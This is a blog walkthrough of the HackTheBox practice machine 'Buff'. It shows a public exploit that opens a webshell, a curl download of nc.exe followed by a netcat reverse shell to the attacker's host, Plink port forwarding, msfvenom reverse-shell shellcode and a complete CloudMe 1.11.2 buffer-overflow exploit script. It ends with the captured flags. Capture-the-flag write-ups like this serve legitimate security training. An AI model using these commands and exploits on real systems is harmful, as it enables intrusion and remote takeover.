BUFF HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-22 09:37 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:37
Completed NSE at 09:37, 0.00s elapsed
Initiating NSE at 09:37
Completed NSE at 09:37, 0.00s elapsed
Initiating NSE at 09:37
Completed NSE at 09:37, 0.00s elapsed
Initiating Ping Scan at 09:37
Scanning 10.10.10.198 [4 ports]
Completed Ping Scan at 09:37, 0.90s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:37
Scanning buff.htb (10.10.10.198) [1000 ports]
Discovered open port 8080/tcp on 10.10.10.198
Completed SYN Stealth Scan at 09:38, 45.74s elapsed (1000 total ports)
Initiating Service scan at 09:38
Scanning 1 service on buff.htb (10.10.10.198)
Completed Service scan at 09:38, 9.32s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against buff.htb (10.10.10.198)
Retrying OS detection (try #2) against buff.htb (10.10.10.198)
Initiating Traceroute at 09:38
Completed Traceroute at 09:38, 0.41s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:38
Completed Parallel DNS resolution of 2 hosts. at 09:38, 0.29s elapsed
NSE: Script scanning 10.10.10.198.
Initiating NSE at 09:38
Completed NSE at 09:39, 34.64s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 12.42s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Nmap scan report for buff.htb (10.10.10.198)
Host is up (0.48s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Randomized

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   399.14 ms 10.10.14.1
2   413.69 ms buff.htb (10.10.10.198)

NSE: Script Post-scanning.
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Initiating NSE at 09:39
Completed NSE at 09:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.38 seconds
           Raw packets sent: 2106 (96.348KB) | Rcvd: 225 (19.761KB)

PORT 8080 ENUMERATION

Here we have nothing as much but we just have upload option in admin page so Lets google for its exploit if available!!

https://www.exploit-db.com/exploits/48506

Here we go with our exploit!!

GETTING USER ACCESS

┌─[✗]─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #python web.py http://buff.htb:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.

C:\xampp\htdocs\gym\upload> curl http://10.10.14.135/nc.exe -o nc.exe
�PNG
�

C:\xampp\htdocs\gym\upload> .\nc.exe 10.10.14.135 9008 -e powershell.exe
┌─[✗]─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #rlwrap nc -lnvp 9008
listening on [any] 9008 ...
connect to [10.10.14.135] from (UNKNOWN) [10.10.10.198] 50045
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\xampp\htdocs\gym\upload> whoami
whoami
buff\shaun
PS C:\xampp\htdocs\gym\upload> cd c:\users\shaun\desktop
cd c:\users\shaun\desktop
PS C:\users\shaun\desktop> type user.txt
type user.txt
7ddf32e17a6ac5ce04a8ecbf782ca509
PS C:\users\shaun\desktop> 

GETTING ROOT ACCESS

Here we have Port 8888 which is being used for cloudme which we can exploit but here we see that we cannot run python exploit in windows machine. But what if we port forward it our machine.

Exploit : https://www.exploit-db.com/exploits/48389

Steps Involved Here :

  1. download Plink.exe : https://www.softpedia.com/get/Network-Tools/Telnet-SSH-Clients/Tatham-Plink.shtml

2. Upload it to Buff’s Machine

3. Open up the SSH service on your machine : service ssh start

4. Then just run the following command :

.\Plink.exe -v -x -a -noagent -ssh -pw $PASSWORD -R 8888:127.0.0.1:8888 $USERNAME@$IP

The OutPut Will Open up Your terminal as Shown below:

PS C:\users\shaun\downloads> .\Plink.exe -v -x -a -noagent -ssh -pw liquid -R 8888:127.0.0.1:8888 age@10.10.14.135 
.\Plink.exe -v -x -a -noagent -ssh -pw liquid -R 8888:127.0.0.1:8888 age@10.10.14.135 
Looking up host "10.10.14.135" for SSH connection
Connecting to 10.10.14.135 port 22
We claim version: SSH-2.0-PuTTY_Release_0.74
Remote version: SSH-2.0-OpenSSH_8.3p1 Debian-1
Using SSH protocol version 2
Doing ECDH key exchange with curve Curve25519 and hash SHA-256 (SHA-NI accelerated)
Server also has ecdsa-sha2-nistp256/ssh-rsa host keys, but we don't know any of them
Host key fingerprint is:
ssh-ed25519 255 32:90:52:02:e3:0d:b7:79:f4:73:03:9e:e1:cb:e8:ed
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 32:90:52:02:e3:0d:b7:79:f4:73:03:9e:e1:cb:e8:ed
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) n
Initialised AES-256 SDCTR (AES-NI accelerated) outbound encryption
Initialised HMAC-SHA-256 (SHA-NI accelerated) outbound MAC algorithm
Initialised AES-256 SDCTR (AES-NI accelerated) inbound encryption
Initialised HMAC-SHA-256 (SHA-NI accelerated) inbound MAC algorithm
Using username "age".
Sent password
Access granted
Requesting remote port 8888 forward to 127.0.0.1:8888
Opening main session channel
Remote port forwarding from 8888 enabled
Opened main channel
Allocated pty
Started a shell/command
Linux liquid 5.6.0-kali1-amd64 #1 SMP Debian 5.6.7-1kali1 (2020-05-12) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
age@liquid:~$

Now Lets check ports on our machine and we will see that Port 8888 is forwarded:

age@liquid:~$ netstat -ltn
netstat -ltn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:902             0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:50505         0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:3790            0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:8888          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:3001          0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN     
tcp6       0      0 :::902                  :::*                    LISTEN     
tcp6       0      0 ::1:7337                :::*                    LISTEN     
tcp6       0      0 ::1:8307                :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 ::1:8888                :::*                    LISTEN     
tcp6       0      0 :::443                  :::*                    LISTEN     
age@liquid:~$

Now we will be modifying our exploit by generating our reverse shell code and replacing it with actual code

┌─[✗]─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.135 LPORT=9003 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of c file: 1386 bytes
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a\x0e\x87\x68"
"\x02\x00\x23\x2b\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

Replace this code with actuall code and run the exploit and remember to listen on port we mentioned in above exploit

WHOLE CODE WILL LOOK LIKE THIS:

┌─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #cat exploit2.py 
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload    = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload   += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload   += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload   += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload   += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload   += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload   += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload   += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload   += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload   += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload   += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
payload   += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
payload   += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
payload   += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
payload   += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
payload   += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
payload   += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))	

buf = padding1 + EIP + NOPS + payload + overrun 

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,9005))
	s.send(buf)
except Exception as e:
	print(sys.exc_value)

RUN THE EXPLOIT :

┌─[root@liquid]─[~/Desktop/HTB/buff]
└──╼ #python exploit1.py 

ON NETCAT LISTENER :

age@liquid:/root/Desktop/HTB/buff$ nc -lnvp 9003
listening on [any] 9003 ...
connect to [10.10.14.135] from (UNKNOWN) [10.10.10.198] 49778
Microsoft Windows [Version 10.0.17134.1550]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\users\administrator\desktop                
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>type root.txt
type root.txt
3dc4c38834d57057973b16256cc750d6

Here we go with our admin access

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: